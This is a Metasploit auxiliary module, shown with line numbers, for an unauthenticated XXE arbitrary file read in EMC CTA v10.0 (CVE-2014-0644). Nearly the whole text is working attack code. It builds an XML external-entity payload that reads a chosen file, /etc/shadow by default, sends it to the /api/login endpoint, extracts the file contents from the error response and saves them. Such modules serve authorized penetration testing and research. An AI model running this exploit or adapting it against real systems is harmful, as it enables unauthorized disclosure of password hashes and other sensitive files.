Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
12
      'Description'    => %q{
13
      EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
14
      that allows an attacker to read arbitrary files from the file system
15
      with the permissions of the root user.
16
      },
17
      'License'        => MSF_LICENSE,
18
      'Author'         =>
19
        [
20
          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
21
        ],
22
      'References'     =>
23
        [
24
          ['CVE', '2014-0644'],
25
          ['EDB', '32623']
26
        ],
27
      'DisclosureDate' => '2014-03-31'
28
    ))
29

30
    register_options(
31
      [
32
        Opt::RPORT(443),
33
        OptBool.new('SSL', [true, 'Use SSL', true]),
34
        OptString.new('TARGETURI', [ true, "Base directory path", '/']),
35
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
36
      ]
37
    )
38
  end
39

40
  def run
41

42
    doctype = Rex::Text.rand_text_alpha(6)
43
    element = Rex::Text.rand_text_alpha(6)
44
    entity = Rex::Text.rand_text_alpha(6)
45

46
    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
47
<!DOCTYPE #{doctype} [
48
<!ELEMENT #{element} ANY >
49
<!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]>
50
<Request>
51
<Username>root</Username>
52
<Password>&#{entity};</Password>
53
</Request>
54
    }
55

56
    res = send_request_cgi({
57
      'uri' => normalize_uri(target_uri.path, 'api', 'login'),
58
      'method' => 'POST',
59
      'data' => pay
60
    })
61

62
    if !res or !res.body
63
      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
64
    end
65

66
    file = /For input string: "(.*)"/m.match(res.body)
67

68
    if !file or file.length < 2
69
      fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")
70
    end
71

72
    file = file[1]
73

74
    path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])
75

76
    print_good("File saved to: " + path)
77
  end
78
end
79

80